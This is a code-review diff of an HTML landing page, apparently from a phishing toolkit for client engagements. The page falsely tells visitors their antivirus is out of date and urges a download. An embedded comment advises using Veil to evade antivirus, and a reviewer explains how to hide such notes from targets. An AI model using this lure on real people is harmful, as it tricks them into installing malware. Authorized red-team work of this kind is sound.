Creds_N_Shell_AV_Update/landing_page/failed

```diff
@@ -0,0 +1,40 @@
+<!DOCTYPE html>
+<html>
+<head>
+  <meta http-equiv="content-type" content="text/html; charset=UTF-8">
+  <title>{{ client.company_name }} Antivirus Verification</title>
+  <link href="./include/style-scan-new.css" media="screen" rel="stylesheet" type="text/css">
+  <link rel="SHORTCUT ICON" href="#">
+</head>
+<body class="index">
+  <div id="container">
+    <header>
+      <h1>
+        <img name="logo" src="./images/logo.png" height="75">
+      </h1>
+    </header>
+    <div id="stage">
+      <section class="compatibility">
+        <article>
+          <h3>Your Antivirus is Out of Date</h3>
+          <br>
+          <p>Your antivirus is currently out of date. To download and install the new antivirus software please click the green "Continue" button below.</p>
+        </article>
+        <div class="download">
+          <ol class="links">
+            <li class="link">
+<!-- Change the link to the payload you've generated. Make sure you use Veil or something similar to bypass antivirus-->
```

Comment:
So HTML comments will show up in the HTML page that is presented to the client. Changing these to Jinja comments will actually cause the server to remove them so a nosey client won't be able to read them.

Jinja comments use `{# this is a comment #}` instead of HTML's `<!-- this is a comment -->`.